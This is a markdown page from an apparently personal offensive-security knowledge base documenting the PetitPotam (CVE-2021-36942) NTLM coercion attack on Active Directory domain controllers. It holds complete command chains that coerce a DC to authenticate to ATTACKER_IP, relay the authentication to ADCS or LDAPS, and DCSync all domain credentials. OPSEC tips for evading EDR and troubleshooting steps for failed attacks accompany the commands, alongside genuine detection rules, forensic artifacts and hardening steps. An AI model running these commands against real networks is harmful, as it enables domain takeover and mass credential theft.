attack-41-petitpotam-cve-2021-36942.md (22717B)
1 --- 2 title: "Attack #41 β PetitPotam (CVE-2021-36942)" 3 description: "PetitPotam exploits the Encrypting File System Remote Protocol (MS-EFSR) to coerce a target (typically a DC) to authenticate to an attacker-controlledβ¦" 4 category: active-directory 5 subcategory: "Domain Controller Attacks" 6 tags: ["active-directory", "adcs", "credential-access", "ntlm", "relay"] 7 tools: ["Impacket", "Certipy", "Responder", "OpenSSL", "PowerShell"] 8 difficulty: advanced 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/AD-Attack/Category-Five/π΅ Attack #41 β PetitPotam (CVE-2021-36942).md" 11 --- 12 # π΅ Attack #41 β PetitPotam (CVE-2021-36942) β NTLM Coercion 13 14 *** 15 16 ## π How It Works 17 18 PetitPotam exploits the **[Encrypting File System Remote Protocol (MS-EFSR)](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/)** to coerce a target (typically a DC) to authenticate to an attacker-controlled host via NTLM. This coerced authentication is then relayed to another service β most commonly **ADCS web enrollment (ESC8)** β to obtain a certificate for the coerced machine account, enabling DCSync and full domain compromise. 19 20 PetitPotam was initially **exploitable without authentication** on unpatched DCs, making it an unauthenticated domain compromise vector when combined with ESC8. 21 22 > [!info]+ Technical Deep-Dive β MS-EFSR RPC Call Flow 23 > 1. The attacker connects to the target's **MS-EFSR RPC endpoint** β accessible via two named pipes: `\pipe\efsrpc` (direct) and `\pipe\lsarpc` (LSASS-hosted) 24 > 2. The DCERPC interface UUID is `c681d488-d850-11d0-8c52-00c04fd90f7e` (MS-EFSR) 25 > 3. The attacker calls one of several **EFS RPC functions** (see table below) with a UNC path pointing to the attacker's listener (e.g., `\\ATTACKER_IP\share\file`) 26 > 4. The target DC attempts to access the specified UNC path, triggering **NTLM authentication** back to the attacker 27 > 5. The attacker captures this NTLM authentication and **relays it** to a target service (ADCS HTTP enrollment, LDAP, SMB, etc.) 28 > 6. *The relay target receives the authentication as if it came from the DC machine account β enabling certificate enrollment, RBCD configuration, or other privileged operations* 29 30 ### Exploitable EFS RPC Functions 31 32 | OpNum | Function Name | Auth Required (Patched) | Auth Required (Unpatched) | 33 |---|---|---|---| 34 | 0 | `EfsRpcOpenFileRaw` | Yes | **No** | 35 | 4 | `EfsRpcDecryptFileSrv` | Yes | Yes | 36 | 5 | `EfsRpcQueryUsersOnFile` | Yes | Yes | 37 | 6 | `EfsRpcQueryRecoveryAgents` | Yes | Yes | 38 | 12 | `EfsRpcEncryptFileSrv` | Yes | Yes | 39 | 15 | `EfsRpcAddUsersToFile` | Yes | Yes | 40 41 > [!warning]+ Patch Status and Authentication Requirements 42 > `fas:TriangleExclamation` 43 > 1. **Pre-August 2021 patch**: `EfsRpcOpenFileRaw` (OpNum 0) was callable **without authentication** β combined with ESC8, this gave unauthenticated domain compromise 44 > 2. **Post-August 2021 patch**: `EfsRpcOpenFileRaw` requires authentication; other functions always required auth 45 > 3. **Post-patch, PetitPotam still works with any domain credential** β the patch only closed the unauthenticated vector 46 > 4. *Even on fully patched systems, PetitPotam with any low-priv domain account + ESC8 = full domain compromise* 47 48 *** 49 50 ## βοΈ Prerequisites 51 52 | Requirement | Detail | 53 |---|---| 54 | **Network access to DC** | MS-EFSR RPC endpoint (port 445 via `\pipe\efsrpc` or `\pipe\lsarpc`) | 55 | **Credentials (on patched DCs)** | Any valid domain user β unauthenticated on unpatched DCs | 56 | **Relay target** | ADCS web enrollment (ESC8), LDAP (if signing not enforced), SMB (if signing not enforced) | 57 | **Listener setup** | ntlmrelayx.py, krbrelayx, or Responder to capture/relay the coerced authentication | 58 59 *** 60 61 ## π οΈ Tools 62 63 | Tool | Platform | Version | Notes | 64 |---|---|---|---| 65 | [PetitPotam.py](https://github.com/topotam/PetitPotam) | Linux/Python | Python 3 | Original exploit by topotam β MS-EFSR coercion | 66 | [Coercer](https://github.com/p0dalirius/Coercer) | Linux/Python | β₯ 2.0 | Multi-protocol coercion tool β includes PetitPotam + many other coercion methods | 67 | [ntlmrelayx.py](https://github.com/fortra/impacket) | Linux | Impacket β₯ 0.10.0 | NTLM relay framework β `--adcs` flag for ESC8 relay | 68 | [krbrelayx](https://github.com/dirkjanm/krbrelayx) | Linux/Python | Latest | Kerberos relay; can relay to LDAP(S) with Kerberos auth | 69 | [Certipy](https://github.com/ly4k/Certipy) | Linux/Python | β₯ 4.0 | Authenticate with obtained certificate β DCSync | 70 | [Responder](https://github.com/lgandx/Responder) | Linux/Python | β₯ 3.0 | Capture NTLM hashes (for cracking instead of relay) | 71 72 *** 73 74 ## β±οΈ Time-to-Execute Estimates 75 76 | Operation | Time | Notes | 77 |---|---|---| 78 | PetitPotam coercion | **2β5 seconds** | Single RPC call | 79 | ntlmrelayx certificate enrollment | **5β15 seconds** | ADCS HTTP enrollment | 80 | Certipy auth (certificate β TGT) | **3β10 seconds** | PKINIT authentication | 81 | Full chain (coerce β relay β DCSync) | **30β90 seconds** | End-to-end domain compromise | 82 83 *** 84 85 ## π» Full Commands 86 87 ### π΄ PetitPotam Coercion 88 89 ```bash 90 # ββ Unauthenticated (unpatched DCs only β pre-Aug 2021) ββββββββββββββββββββββ 91 python3 PetitPotam.py LISTENER_IP DC01.corp.local 92 93 # ββ Authenticated (works on all DCs) βββββββββββββββββββββββββββββββββββββββββ 94 python3 PetitPotam.py -u low_user -p 'Password1' -d corp.local \ 95 LISTENER_IP DC01.corp.local 96 97 # ββ With Pass-the-Hash ββββββββββββββββββββββββββββββββββββββββββββββββββββββββ 98 python3 PetitPotam.py -u low_user -hashes :aabbccdd11223344 -d corp.local \ 99 LISTENER_IP DC01.corp.local 100 101 # ββ Specify named pipe (bypass pipe filtering) ββββββββββββββββββββββββββββββββ 102 python3 PetitPotam.py -u low_user -p 'Password1' -d corp.local \ 103 -pipe lsarpc LISTENER_IP DC01.corp.local 104 # Try: efsrpc, lsarpc, samr, netlogon, lsass 105 ``` 106 107 ### π΄ Full Attack Chain β PetitPotam + ESC8 (Most Common) 108 109 ```bash 110 # ββ Terminal 1: Start relay to ADCS web enrollment ββββββββββββββββββββββββββββ 111 ntlmrelayx.py -t http://CA01.corp.local/certsrv/certfnsh.asp \ 112 -smb2support --adcs --template DomainController 113 114 # ββ Terminal 2: Coerce DC to authenticate to our relay ββββββββββββββββββββββββ 115 python3 PetitPotam.py ATTACKER_IP DC01.corp.local 116 # (or with auth: python3 PetitPotam.py -u user -p pass -d corp.local ATTACKER_IP DC01.corp.local) 117 118 # ββ Result: ntlmrelayx captures a certificate for DC01$ ββββββββββββββββββββββ 119 # Output: "Certificate is saved to DC01.corp.local.b64" 120 121 # ββ Terminal 3: Authenticate with the certificate β get TGT β DCSync βββββββββ 122 certipy auth -pfx DC01.pfx -dc-ip 10.10.10.10 123 # Outputs: DC01.ccache (TGT for DC01$ machine account) 124 125 export KRB5CCNAME=DC01.ccache 126 secretsdump.py -k -no-pass corp.local/'DC01$'@DC01.corp.local -just-dc 127 # Full domain credential dump via DCSync 128 ``` 129 130 ### π΄ PetitPotam + LDAPS Relay (RBCD Abuse) 131 132 ```bash 133 # ββ If LDAP signing is NOT enforced and ADCS is not available βββββββββββββββββ 134 135 # Terminal 1: Start LDAPS relay with delegate access 136 ntlmrelayx.py -t ldaps://DC02.corp.local --delegate-access -smb2support 137 138 # Terminal 2: Coerce DC01 to authenticate 139 python3 PetitPotam.py -u low_user -p 'Password1' -d corp.local \ 140 ATTACKER_IP DC01.corp.local 141 142 # Result: ntlmrelayx creates a machine account and configures RBCD 143 # Output: "Delegation rights modified β YOURPC$ can delegate to DC01$" 144 145 # Terminal 3: S4U2Self + S4U2Proxy to impersonate Administrator 146 getST.py -spn cifs/DC01.corp.local -impersonate Administrator \ 147 -dc-ip 10.10.10.10 corp.local/'YOURPC$':'RandomPassword' 148 149 export KRB5CCNAME=Administrator@cifs_DC01.corp.local@CORP.LOCAL.ccache 150 secretsdump.py -k -no-pass corp.local/Administrator@DC01.corp.local 151 ``` 152 153 ### π΄ Coercer (Multi-Protocol β Includes PetitPotam + More) 154 155 ```bash 156 # ββ Scan for all available coercion methods βββββββββββββββββββββββββββββββββββ 157 coercer scan -u low_user -p 'Password1' -d corp.local \ 158 -t DC01.corp.local 159 160 # ββ Coerce via MS-EFSR specifically ββββββββββββββββββββββββββββββββββββββββββ 161 coercer coerce -u low_user -p 'Password1' -d corp.local \ 162 -l LISTENER_IP -t DC01.corp.local --filter-protocol-name MS-EFSR 163 164 # ββ Coerce via ALL available protocols ββββββββββββββββββββββββββββββββββββββββ 165 coercer coerce -u low_user -p 'Password1' -d corp.local \ 166 -l LISTENER_IP -t DC01.corp.local 167 168 # ββ Coerce with specific pipe ββββββββββββββββββββββββββββββββββββββββββββββββ 169 coercer coerce -u low_user -p 'Password1' -d corp.local \ 170 -l LISTENER_IP -t DC01.corp.local --filter-pipe-name efsrpc 171 ``` 172 173 *** 174 175 ## π― OPSEC Tips 176 177 1. **PetitPotam coercion itself is relatively quiet** β a single EFS RPC call generates minimal logs compared to brute-force attacks 178 2. **The relay portion is the noisy part** β NTLM relay to ADCS generates certificate enrollment events; relay to LDAP generates LDAP modification events 179 3. **Use `\pipe\lsarpc` instead of `\pipe\efsrpc`** β some EDR tools specifically monitor for `efsrpc` pipe access; `lsarpc` is more common and blends with normal traffic 180 4. **Coercer's scan mode is detectable** β it probes multiple RPC endpoints; use targeted coercion (specify protocol) instead of scanning all protocols 181 5. **Time the attack during business hours** β NTLM traffic is normal during working hours; off-hours coercion stands out in traffic analysis 182 6. **Clean up RBCD delegations** if using the LDAPS relay path β leftover `msDS-AllowedToActOnBehalfOfOtherIdentity` entries are forensic artifacts 183 184 ### π OpSec Ranking 185 186 | Method | Stealth | Speed | Reliability | Notes | 187 |---|---|---|---|---| 188 | PetitPotam + ESC8 (unauth) | π’ High | π’ Fast | π’ High | Single RPC call + HTTP relay; minimal footprint | 189 | PetitPotam + ESC8 (auth) | π’ High | π’ Fast | π’ High | Same as above with auth; still very clean | 190 | PetitPotam + LDAPS relay | π‘ Medium | π‘ Medium | π‘ Medium | Creates machine account + RBCD entry (artifacts) | 191 | Coercer scan (all protocols) | π΄ Low | π‘ Medium | π’ High | Probes many RPC endpoints β noisy | 192 | Coercer targeted (MS-EFSR only) | π’ High | π’ Fast | π’ High | Same as PetitPotam with better CLI | 193 194 *** 195 196 ## π‘οΈ Detection β Event IDs 197 198 | Event ID | Source | What to Look For | 199 |---|---|---| 200 | **4624** | Security Log (DC) | NTLM authentication from DC machine account to unexpected host (the relay target) | 201 | **5145** | Security Log | Network share access β `\pipe\efsrpc` or `\pipe\lsarpc` pipe access from non-admin | 202 | **4768** | Security Log (CA) | TGT request using certificate authentication (PKINIT) β post-relay indicator | 203 | **4886/4887** | CA Event Log | Certificate request received/approved for a DC machine account template | 204 | **4625** | Security Log | Failed NTLM authentication attempts (if relay fails) | 205 206 ### π Sigma Rules 207 208 ```yaml 209 # ββ SigmaHQ β PetitPotam NTLM Coercion via MS-EFSR ββββββββββββββββββββββββββ 210 title: PetitPotam NTLM Coercion (MS-EFSR Pipe Access) 211 id: f0d2e6b8-petitpotam-efsr-coercion 212 status: experimental 213 logsource: 214 product: windows 215 service: security 216 detection: 217 selection: 218 EventID: 5145 219 ShareName: '\\*\IPC$' 220 RelativeTargetName|contains: 221 - 'efsrpc' 222 - 'lsarpc' 223 condition: selection 224 level: high 225 tags: 226 - attack.credential_access 227 - attack.t1187 228 - cve.2021.36942 229 ``` 230 231 ```yaml 232 # ββ SigmaHQ β ADCS Certificate Enrollment for Machine Account ββββββββββββββββ 233 title: Suspicious Certificate Enrollment for Machine Account 234 id: a1b2c3d4-adcs-machine-cert-enrollment 235 logsource: 236 product: windows 237 service: security 238 provider: 'Microsoft-Windows-CertificateServicesClient-AutoEnroll' 239 detection: 240 selection: 241 EventID: 242 - 4886 243 - 4887 244 SubjectName|contains: '$' 245 Template|contains: 'DomainController' 246 condition: selection 247 level: high 248 ``` 249 250 ### π‘οΈ EDR-Specific Detections 251 252 > [!warning]+ Microsoft Defender for Identity (MDI) 253 > 1. **"Suspected NTLM authentication tampering"** β detects NTLM relay patterns including PetitPotam-initiated coercion 254 > 2. **"Suspected NTLM relay attack (Exchange account)"** β broader relay detection that also catches PetitPotam chains 255 > 3. MDI correlates NTLM authentication from DC machine accounts to non-DC targets as suspicious 256 > 4. *Post-2023 MDI updates include specific PetitPotam coercion detection via MS-EFSR pipe monitoring* 257 258 > [!warning]+ CrowdStrike Falcon 259 > 1. **"NTLM Coercion Attack Detected"** β behavioral detection for MS-EFSR-triggered NTLM authentication to external hosts 260 > 2. Falcon monitors outbound NTLM from DC machine accounts β any auth to a non-DC is flagged 261 > 3. Process-level detection for PetitPotam.py and Coercer execution on attacker machines within the network 262 263 > [!warning]+ Elastic Security 264 > 1. Rule: **"Potential NTLM Coercion via MS-EFSR"** β monitors for EFS pipe access from unusual sources 265 > 2. Rule: **"ADCS Certificate Enrollment for Machine Account"** β detects relay-to-ADCS chain completion 266 > 3. Rule: **"Outbound NTLM from Domain Controller"** β network-level detection for DC-originated NTLM to non-DCs 267 268 *** 269 270 ## π¬ Forensic Artifacts 271 272 | Artifact | Location | Details | 273 |---|---|---| 274 | **Named pipe access** | Event 5145 / Sysmon 17/18 | `\pipe\efsrpc` or `\pipe\lsarpc` access from attacker IP | 275 | **NTLM auth from DC** | Event 4624 on relay target | DC machine account authenticating to unexpected service (ADCS, LDAP) | 276 | **Certificate enrollment** | CA Event Log (4886/4887) | Certificate issued to DC machine account via web enrollment | 277 | **RBCD entry** | AD object `msDS-AllowedToActOnBehalfOfOtherIdentity` | If LDAPS relay was used β check this attribute on compromised accounts | 278 | **Machine account creation** | Event 4741 | If LDAPS relay created a new machine account for RBCD | 279 | **Network capture** | PCAP | MS-EFSR RPC call β NTLM auth β relay to ADCS/LDAP; identifiable by DCERPC UUID and UNC paths | 280 281 *** 282 283 > [!important]+ Windows Server Version & Patch Differences 284 > 1. **Pre-August 2021**: `EfsRpcOpenFileRaw` callable without authentication β **unauthenticated domain compromise** when paired with ESC8 285 > 2. **August 2021 patch**: Closes unauthenticated vector for `EfsRpcOpenFileRaw`; other functions still require only low-priv auth 286 > 3. **Server 2016**: Vulnerable; patch available 287 > 4. **Server 2019**: Vulnerable; patch available 288 > 5. **Server 2022**: Shipped patched for unauth; authenticated coercion still works unless EPA is enforced on ADCS 289 > 6. **Server 2025**: EPA enabled by default on IIS/ADCS HTTP endpoints β blocks the ESC8 relay path out of the box; LDAPS relay may still work if LDAP channel binding is not enforced 290 > 7. *The definitive mitigation is enforcing Extended Protection for Authentication (EPA) on ADCS web enrollment + enforcing LDAP channel binding β NOT just patching PetitPotam* 291 292 *** 293 294 ## π Hardening & Prevention 295 296 ```powershell 297 # ββ 1. Enable EPA on ADCS Web Enrollment (blocks ESC8 relay) βββββββββββββββββ 298 # On the CA server running Certificate Authority Web Enrollment: 299 # IIS Manager β Sites β Default Web Site β certsrv β 300 # Authentication β Windows Authentication β Advanced Settings β 301 # Extended Protection: Required 302 # Token Checking: Allow 303 304 # Or via appcmd: 305 appcmd.exe set config "Default Web Site/certsrv" ` 306 /section:windowsAuthentication /extendedProtection.tokenChecking:Require 307 308 # ββ 2. Enforce LDAP signing (blocks LDAP relay) ββββββββββββββββββββββββββββββ 309 # GPO β Computer Configuration β Windows Settings β Security Settings β 310 # Local Policies β Security Options β 311 # "Domain controller: LDAP server signing requirements" = "Require signing" 312 313 # Registry on DCs: 314 Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\NTDS\Parameters" ` 315 -Name "LDAPServerIntegrity" -Value 2 -Type DWord 316 317 # ββ 3. Enforce LDAP channel binding (blocks LDAPS relay) βββββββββββββββββββββ 318 Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\NTDS\Parameters" ` 319 -Name "LdapEnforceChannelBinding" -Value 2 -Type DWord 320 # Value 2 = Always enforce channel binding 321 322 # ββ 4. Disable NTLM where possible βββββββββββββββββββββββββββββββββββββββββββ 323 # GPO β Computer Configuration β Windows Settings β Security Settings β 324 # Local Policies β Security Options β 325 # "Network security: Restrict NTLM: NTLM authentication in this domain" = "Deny all" 326 # β οΈ Test thoroughly β many legacy apps depend on NTLM 327 328 # ββ 5. Disable unnecessary EFS RPC service ββββββββββββββββββββββββββββββββββββ 329 # If EFS is not used, consider disabling access to the EFS pipe: 330 # However, there is no clean way to disable MS-EFSR without breaking EFS functionality 331 # Best approach: patch + EPA + LDAP signing 332 333 # ββ 6. Block outbound NTLM from Domain Controllers βββββββββββββββββββββββββββ 334 # Windows Firewall rule to prevent DCs from authenticating to workstation IPs: 335 New-NetFirewallRule -DisplayName "Block DC Outbound SMB/NTLM" ` 336 -Direction Outbound -Protocol TCP -RemotePort 445 ` 337 -RemoteAddress "10.10.10.0/24" -Action Block ` 338 -Profile Domain 339 # β οΈ Exclude other DC IPs and trusted servers 340 341 # ββ 7. Remove the ADCS HTTP enrollment endpoint entirely βββββββββββββββββββββ 342 # If web enrollment is not needed, disable it: 343 # Server Manager β Remove Roles β Remove "Certificate Authority Web Enrollment" 344 # This completely eliminates the ESC8 attack surface 345 346 # ββ 8. Apply August 2021 patch ββββββββββββββββββββββββββββββββββββββββββββββββ 347 # KB5005565 (Server 2019), KB5005573 (Server 2016) 348 # Closes the unauthenticated vector β but authenticated PetitPotam still works 349 ``` 350 351 *** 352 353 ## π§© Troubleshooting 354 355 | Error | Cause | Fix | 356 |---|---|---| 357 | PetitPotam returns `STATUS_ACCESS_DENIED` | DC is patched; unauthenticated access blocked | Add `-u user -p pass -d domain` for authenticated coercion | 358 | `Connection refused` on pipe | MS-EFSR pipe is filtered or firewalled | Try alternative pipes: `-pipe lsarpc`, `-pipe samr`, `-pipe netlogon` | 359 | ntlmrelayx shows `Authenticating against ldaps://... failed` | LDAP channel binding is enforced | Switch relay target to ADCS HTTP enrollment (ESC8) instead of LDAP | 360 | Certificate enrollment fails with `Access Denied` | Template doesn't allow machine account enrollment | Use `--template DomainController` or `--template Machine`; verify template permissions with `certipy find` | 361 | Coercion works but no auth received on listener | Target DC can't reach attacker IP (firewall) | Verify bidirectional connectivity on port 445; attacker IP must be routable from the DC | 362 | `Certipy auth` fails with `KDC_ERR_PADATA_TYPE_NOSUPP` | DC doesn't support PKINIT or certificate is invalid | Verify PKINIT is enabled on the DC; check the certificate with `openssl x509 -in cert.pem -text` | 363 | Relay to ADCS succeeds but cert is for wrong account | ntlmrelayx template mismatch | Specify `--template DomainController` to ensure the cert is issued for the DC machine account | 364 | `Coercer scan` shows no vulnerable methods | All protocols patched or filtered | Try targeted coercion with specific protocols; some newer MS-EFSR functions may still work | 365 366 *** 367 368 ## πΊοΈ MITRE ATT&CK 369 370 | Tactic | Technique ID | Sub-technique | Procedure | APT Groups | 371 |---|---|---|---|---| 372 | **Credential Access** | [T1187](https://attack.mitre.org/techniques/T1187/) | Forced Authentication | Coerce DC NTLM authentication via MS-EFSR RPC calls | Used in ransomware campaigns, red team operations | 373 | **Credential Access** | [T1557](https://attack.mitre.org/techniques/T1557/) | [.001 β LLMNR/NBT-NS Poisoning or MDNS](https://attack.mitre.org/techniques/T1557/001/) | Relay coerced NTLM authentication to ADCS, LDAP, or SMB targets | Chained technique | 374 | **Privilege Escalation** | [T1068](https://attack.mitre.org/techniques/T1068/) | Exploitation for Privilege Escalation | Chain PetitPotam + ESC8 for domain escalation from any domain user | Multiple ransomware groups | 375 376 > [!tip]+ Real-World Usage 377 > `fas:Lightbulb` 378 > 1. **PetitPotam + ESC8** is one of the most commonly exploited attack chains in modern AD pentests β nearly every environment with ADCS web enrollment enabled is vulnerable 379 > 2. **LockBit, BlackCat/ALPHV** ransomware groups have incorporated PetitPotam into their automated domain compromise playbooks 380 > 3. **CISA Alert AA21-209A** specifically warns about PetitPotam exploitation in the wild 381 > 4. *The combination of PetitPotam (coercion) + ESC8 (relay) represents the most impactful AD attack chain discovered since Zerologon* 382 383 *** 384 385 ## π Attack Chain Context 386 387 ``` 388 [PetitPotam] βββ NTLM Coercion β Relay β Domain Compromise 389 β 390 ββββ π PetitPotam + ESC8 = most common ADCS attack chain (Attack #33) 391 ββββ π Also chains with: LDAP relay β RBCD, Unconstrained Delegation (Attack #15) 392 ββββ π Related: PrinterBug (Attack #42) β MS-RPRN coercion (similar concept) 393 ββββ π Related: NTLM Relay (Attack #7) β relay framework 394 ββββ π₯ Unauthenticated on unpatched DCs (pre-Aug 2021 patches) 395 ββββ π Coercer tool combines PetitPotam with DFSCoerce, PrinterBug, and more 396 ββββ π Defeated by: patch, enable EPA on ADCS, enforce LDAP signing/channel binding, disable NTLM 397 ``` 398 399 *** 400 401 > β **Attack #41 β PetitPotam complete.**